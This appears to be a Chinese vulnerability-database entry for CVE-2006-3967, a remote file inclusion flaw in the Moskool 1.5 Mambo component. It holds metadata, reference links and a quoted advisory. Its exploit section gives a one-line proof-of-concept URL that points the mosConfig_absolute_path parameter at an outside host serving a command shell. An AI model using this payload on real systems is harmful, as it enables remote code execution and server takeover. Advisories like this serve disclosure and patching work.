Moskool Component 'Admin.Moskool.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110715 漏洞类型 输入验证
发布时间 2006-07-31 更新时间 2006-08-03
CVE编号 CVE-2006-3967 CNNVD-ID CNNVD-200608-006
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28310
https://cxsecurity.com/issue/WLB-2006080023
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-006
|漏洞详情
MamboXChangeMoskool1.5中的component/option,com_moskool/Itemid,34/admin.moskool.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助mosConfig_absolute_path参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19245/info

Moskool is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.

Version 1.5 is vulnerable to this issue; other versions may also be affected.

http://[target]/component/option,com_moskool/Itemid,34/admin.moskool.php?mosConfig_absolute_path?=http://sit/shell.txt?cmd
|参考资料

来源:BID
名称:19245
链接:http://www.securityfocus.com/bid/19245
来源:BUGTRAQ
名称:20060730com_moskool(admin.moskool.php)RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/441710/100/0/threaded
来源:XF
名称:moskool-adminmoskool-file-include(28097)
链接:http://xforce.iss.net/xforce/xfdb/28097
来源:SREASON
名称:1314
链接:http://securityreason.com/securityalert/1314